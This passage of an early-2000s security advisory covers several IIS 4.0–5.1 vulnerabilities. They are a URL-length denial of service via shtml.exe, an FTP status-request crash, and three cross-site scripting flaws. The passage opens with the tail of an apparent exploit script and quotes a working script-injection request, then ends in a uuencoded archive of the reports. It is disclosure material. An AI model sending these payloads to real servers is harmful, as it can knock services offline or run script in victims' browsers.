else
{
die("connect problems\n");
}
}
Problem n°6
===========
Access violation in URL error handling
A denial of service vulnerability involving the way IIS 4.0, 5.0, and
5.1 handle an error condition from ISAPI filters. At least one ISAPI
filter (which ships as part of FrontPage Server Extensions and
ASP.NET), and possibly others, generate an error when a request is
received containing an URL that exceeds the maximum length set by the
filter. In processing this error, the filter replaces the URL with a
null value. A flaw results because IIS attempts to process the URL in
the course of sending the error message back to the requester,
resulting in an access violation that causes the IIS service to fail.
Peter Gründl of KPMG Danemark added :
Frontpage contains URL parsers for dynamic components (shtml.exe/dll)
If a malicious user issues a request for /_vti_bin/shtml.exe where the
URL for the dynamic contents is replaced with a long URL, the submodule
will filter out the URL, and return a null value to the web service URL
parser. An example string would be 35K of ascii 300. This will cause an
access violation and Inetinfo.exe will be shut down. Due to the nature
of the crash, we do not feel that it is exploitable beyond the point of
a Denial of Service.
See report by @Stake [http://www.atstake.com] in file provided below.
Problem n°7
===========
Denial of service via FTP Status request
A denial of service vulnerability involving the way the FTP service in
IIS 4.0, 5.0 and 5.1 handles a request for the status of the current
FTP session. If an attacker were able to establish an FTP session with
an affected server, and levied a status request that created a
particular error condition, a flaw in the FTP code would prevent it
from correctly reporting the error. Other code within the FTP service
would then attempt to use uninitialized data, with an access violation
as the result. This would result in the disruption of not only FTP
services, but also of web services.
Problem n°8,9,10
================
Cross-site Scripting in IIS Help File search facility, HTTP Error Page, and Redirect Response message
A trio of Cross-Site Scripting (CSS) vulnerabilities affecting IIS 4.0,
5.0 and 5.1: one involving the results page that’s returned when
searching the IIS Help Files, one involving HTTP error pages; and one
involving the error message that’s returned to advise that a requested
URL has been redirected. All of these vulnerabilities have the same
scope and effect: an attacker who was able to lure a user into clicking
a link on his web site could relay a request containing script to a
third-party web site running IIS, thereby causing the third-party
site’s response (still including the script) to be sent to the user.
The script would then render using the security settings of the
third-party site rather than the attacker’s.
See report by Joe Smith and zenomorph [http://www.cgisecurity.com] for
Help File search CSS in file provided below.
Credit goes to Keigo Yamazaki of the LAC SNS Team
[http://www.lac.co.jp/security/] for redirect response message CSS :
When a request is submitted to IIS, it returns a "302 Object Moved"
error message to the client without changing the metacharacters
contained in the request. This occurs when the request contains the
following URI:
GET /existing directory name?"><script>alert("aaa"); </script>
See report by Thor Larholm of Jubii A/S [http://www.jubii.dk/] for HTTP
Error page CSS in file provided below.
UUEncoded file
begin 644 reports.zip
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
[email protected]\=!Z:3&Y+4U4P&54COX3IUJ%-!'SH=TE_J%4R-<=-RH2RI"-+W
MH#HZBE[7>[@9`];:RI=.V[TX":YG6>R$R<^')N\B"HJRC7!YI%KU#()=G\R"
M`(F=BH38/".=H6A[<.;`(7G&J];*H!DYM3#[%,D!R^``))6P=J-IL`Y!5V9.
M@78*@9*U:T^X6^=[%5%72;`A)Q84CP."P:CU:DP@F-"-FD.D"8P`$N(%M(9N
MZ>C&QY?DYDVV$8Z6"TFM=1)>XFHKYIYR12DG0*UF@/U)]Z#.UR_^50<54D76
MRK"/WS:N'GLX+!K7HRV?_%S`\;9%PI6[0Y(#[email protected]]FY$5?F=TA]%8]@K-
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
MC=5YG+A2-]VHX4XA/<$V8Y/@F36M*%T\7E!H@YJBE&T!,OED+A **SULI-
M8A7/;!I%O#":KMU@74UEAV$8`7@-I8<"PB3T96G0,`D<(JU7QGE29U&5A3TV
MV;E$ZEVZLE"3T,;PB@RR<'Z7E%8U5-(N&*(R-:%HF7'%0AQI><]HU'&JNODX
M4FH.+&"7K`5).]$V/%&XA$?3LG;5RN1(_709ME$5N50P96SJ2[FFHJ]?Z6"F
M%*QA09%<EQPAHC(A8&P99PQNU@9;/ADLNAV7-YSZL]1&%J1V8'52*FLR#;=V
MY1(92:4ZBC!4`"%B([[email protected];!QN6CX%N2=2F$%J1G:0)"KTV'=6E*,0K<*,
MHX#!DT<P2`ND<S;:/`-\J7)^PYH";V&,(K-(U@96"RE7MAS7S@NJJ$J8$99-
M,ZZ$65*8EC+FW"[_U`,)X"(>[WFX3O>HVEH@N4M4@0MR1ET0H[GZKS+.C?_!
M'4UD=*4NWZ6Z"C?G<6%\JE'8.:/4S61>K]E'Y"O`/39,5-J949RX8+OE;!%S
M$8'D++\J0@[[K]A4"B$\*>5B]2DA/9NOH%($'_H,U\-"H2;B7(Z099G]05UW
M`,)U9A,4U^GW,H])CF['971,ZV/3Q$-,;5,5MXKC.<RU5;)&1@W0"+NVJ9C,
MPE5<-O=#A1!E$&"$[%[J#\L#HFU5[=!]J)ZW5TOL4,&K=MF.!+.NL$F!TP6'
M?-(-^3'G=LK7F=WHFMU!8_O$,=Y`60NDR4>=F!"!=R_L0PEOEINL1$^QP1;N
MM.IV#H_URAL\F"N54E7B;ILS1*T9X=T`!Q&3]"]BK,#AAB>;;59S/N5^W@M!
M.2*,=4`XF`1"PY=2%PBCR'!J):G.L/O!O.3B-E2%,F'5[5+#C'R05$%W!)>Q
MQ'3M%,QUW[0,4!$IXJA=8?YJ5V-3K7=>&/B2O]LMIS"67=,>](?],?-MS)7T
MJ/FNK;(?8]HW>::-\ZH-T&S-`#%V*`;AKS;@(!B8H)VJ%>U"M:U=:XXH5*@$
MAE3F[)EQH1U@'-<KS8"/#+L]F2-Q9F#[/M:PEGE1+-_L[6&7U'?[J;V*."'T
M!^I?('>-;%+J5ON$E)R;+@[Y*<-`LLU*1&NPS3#QQA;3&NLL'`5>K*`-D"KV
MW/0]-WWO_;4_W/4'4_(3XN0=D(H+T#JQP*W?B"N@M!9GR#**<L5I,_%=H:J0
M.59OCV*VKM;(.!]5OE!S(OU;KFC).Q(0*+F-^E)E'(OF)D?'J4F"[&F<')W(
MV`B5<+.U01:9C'.M:8+@9IK=2V[HY)8EBM2HGVQ"S95Q*5*_QZNQ1GD9PPJ9
M_$+>Q4&[+_`.VXP\OIL78CO8$8/#P^DN==",'9W$=T`B,:8")K&GA;PF!U`^
MHC@$N[O#5IC,/K+;(`(9HL2STNV3"E,FJ;Q`_$A@5WF6FF(:L;L@4N2DD`4N
M1!HR#H_*!U9NFBM(Q523<%T!(&D7!L*@!CY!(Q+KK,1`/3=M)Q1LJ<F,P`+X
MFSH*II07;7[L.G52"N-R0?`G96B*+L>MO>>)I>DZJMV%C!-#Y6=F@UJ<$>U%
MEQ5*C#$96R)1PE;;U+K%5V5AV@#));$@J44ETSM5"9[RUK0O?M=5T*5V4$V%
M$"GBPFRJN<TA*4"30BB?L(SB^!HYOMG9N:E3\H=+()V3'F.7]'-U)W-;Y%,3
MJUZ.\VV*)'U/6M!S9^NR!+LYEUM);*H-BWLH%Z::0�&75FL6QLTE')&LFH
M=T3,I3:`FWT=D>6M#G9N4#[J+*>]%C_'6*.LP6DA3)JV=1"&Y#^@+EVE`JM_
M9>7\JE0X0X$*VS9ZA6F%KA-'><L3Y3*D7I4I'J'D!<?U(N/6Q#..T@R*IZ[)
M1&S]7'_M=H[^GU^F5W)=+A8RI\YW\WJ[`VCK'8IEO(T@]X&JM8RH7<N=N345
MPRB0.)-6SCU3-'R1$39PTXT\]6N6FP#6MD]DNK)XJEC0BH8^E4'FQ2+98W_?
M^WA%(<D?#?P^745N4O=<ZR(UY?",1+WIK5Y\AK#Q\*#7?Q(.+`L;Y1Q,3P..
M/UQ?B)O3=V<?+B\N?_N'>'?9]RYN3OI8MA+SL9#<4<@62S+[1])A>YG*5"<D
MH>UU<K;94-7N$Z]WO]^(L].KT]UOO+H=:F^V6J^VW+-KT=:Y$L\9K+A!R4"H
M<!Y)VZW;=^":MM=_F.+!8US'?5]XIK;B_D^(V9]0&5`G].8,`SY>7?YV=?Q>
M?#J_N!"7'R[^`2RO;S"JQI;R=I9D=VN'[;-@=3M?U5_QS^U+K_<(K/^(4PK6
M2O1T$<KHH3_O-2[^B(MQUI__M'$MB6>/+N:TEVA?M&9EKBYS>;>0+@*(;=#P
M>I_T\,O^T#S*HIR#I)!NTP>9WP4>1?+\-7V^__,SQORSV]F*HVVZ)[X[$B-<
MVJ)K6YRPHNW>*P2O)5)T3OO>)97V@'=^F]ZF/8^H=#M_^I]WWC:G;,5(#9@W
M&$[Z/OX-8'-3O]T&=]/KR66A,15E'K+WPM2/CR#NT5@:G2ML]E/AT]1_\:63
M3Y=7)T+G`77=COP'?Z"&T6P0[([>[NWAJS\:3T:3T=LMFKZW5[4$4'>>G5Y<
MO+L\.:VH=#M_P5\PXLA-/#14)A,UBWS[!2L<1($*\*5W^S`(;A^BV>V#.NAV
M;G&OA\MTW:^NFZO,K%%""-L^_WC$,`P^OVU=_Q5`FSO[?(<4N%(STL.1++)X
MF^\-#7AF&C@^PH)!T'SWA.A1MY]^@X&A>S.30[I*3P)Z;[>V")7!@7NF!*J?
MKH^I[;:UTK3&]>6[OY_>;/'G)$.$`GS84AVQ"F!!&'U-RBV7VP2-/_"^7^D=
MLBF_MBG6<6/DCFF6]XP)6*7N#FJMFK[.ELZ"KZ2/+['I_M$`^MU'QOX2R46<
MK(^.?_UR_N'TIG6+X9H72)K;%KR=UGWS@7\=(:04_&G;Z(5'ZB-:6A7;EKI'
M,'RYOKDZ/7[O^3M6=GUTM#O8D/*:YXD`-0(VJB^)N66(V%)C6WO;1FKAI!:O
M=[ZGWYZ._UME<%9\WMD1%*+%HW7?R91BH*7FRO&Z\8F(AMWN\XB3+6&[$T5_
MCOS#`[(]8UT:]7M"68D3`FQI/+Y]F))AP\[V]V%K_NW##.^(WI/;AW`*"\-U
MY9MQ$8\CNPL.<>6PQU2FX>W#D%PDJM\SS#S`C`.L,(&U'JC;!SFSU\=$X<"N
MB3C'5.CN_M#P(*49.0$/$XPY`,6#_0:%F9M+E(9,VU`916TJQ-L$[ZEO9Q(U
M?#\8N7F."LT81987N_YPW\Q4$\,+43O$>^"WI1TS)O0I]&M<1F.#V(N4#I^G
M9-$]M)1`909N1WB/#VI*!^!U-#%S)HQL9'41[F_P,K*CIV[TYE@[SC?H1AP&
M#[#63!DJ@]#$'EK_)0ID3P<\>P:,]Y6;9:B\.'/J5L2<R%C?^,!A8F;55%HS
M1_5,0M8?-/E\#I<I9NZ/VCIP5(+1IK0O41E.VU2:_D3:'OO_#I7!!A72%WE`
M)?UT4W*B1OYY(*V.)B^-QN?`4"7)ZG&5U>VWK8XB0%,27QG[J:5IKD)4S$Q#
M);061[IXD2??C!OLMS0]?5K3@95@X'\+EV!:X^*_@.*41P\V8IB+'=*OHQ19
M&>,P-'9"\8/MA2(E[HTG]76#&U&F;QQ/_3K6T;N*3L%CE"-E^#>_'14SJJ8R
M\FM*A`W-'OLUM8JW@?4(WR$\MCI2C=%CO]97TT;&UFXJ#8PX,K`.ZAQ`=Z3?
MMHU@U*`PW;0&UA&/Z%7YB&RFR<^SU/R6IEF*VE[&DYHG0G?LU]\/IQO?@Z=P
MB2P?WZ3F-[\3E4.R`[_!BXV]Y/,T:H;W_E/1`M+,@,V(T359S%+9K[/9L[,?
M:;ORQHFA0CF:LCAS/7+W#+7J^K2^/F*$B0J/LG&7Z$?^X_7#6;M6"$8U+L:_
M#-<U+HP-H;=?OYU]N.^,JLW?8Y9HO-^VEZAAO[.1]4)KQR/+YR%'>:?ARK^;
M.6!#HD._ELKQ8:38K'2<IIM2.'L]#&H+4!;]IZE,K=61%!-(,#ILKS^;&,E>
MXH-&UNC.GI#J2;ZF!@$3J6CM@]!0:7JAH[BY:KW2)KI.1^RW?KT>1>_I?AV#
M:4624,U,1#_D-_L1?S)4#NT=TNK^L-;J9M8E*H>'32K-B#G>L)%OX10TH@)%
M86LO&]P/IRZ+/,:GQI"],:PU_93^_C<HM_UH8B-1I=61TZKAD2(Y83,;-3-L
M,*JI$)J#X#D<W)BG\J3+L)7O/*ICS):9=BMV(S(XZO&Q.MIA5Z?I;O/;M/>V
M,6IXU&N<KWMT>W34^]8).SHJTSIC]XC(^*CWQ*D[VC'QN3L:_VA.<-3SW0UW
MT]VN-UF\`1OXP]'K*6__MQ9JH;$-;0WP?*C-;@J[G?:]G1TW+5BNM[]O$[;[
MR/8$R(M])V2MK^_L#CY[U3?OT6VSQK]#>_!9''&WIMYC4EN[%G/`6\U*3'O/
M\SU[US9^M.TQ50-ZK_0K_;=7NF4(K[0Y3?D*(IGOK_3`-Y_H_Q']=XQ7]>47
MO/@^9O0\/?!<#\9K(ZZ'GND.>'KDZ;&WE.'>:\]VG;R_NAW3-WJ]Y^E@QXE+
MO1MB&.`=.0PM_S1&X/5ZVW2>7N]@`'X:`A)KO1W`9WM2!-,+PTDL'FZ9,KC9
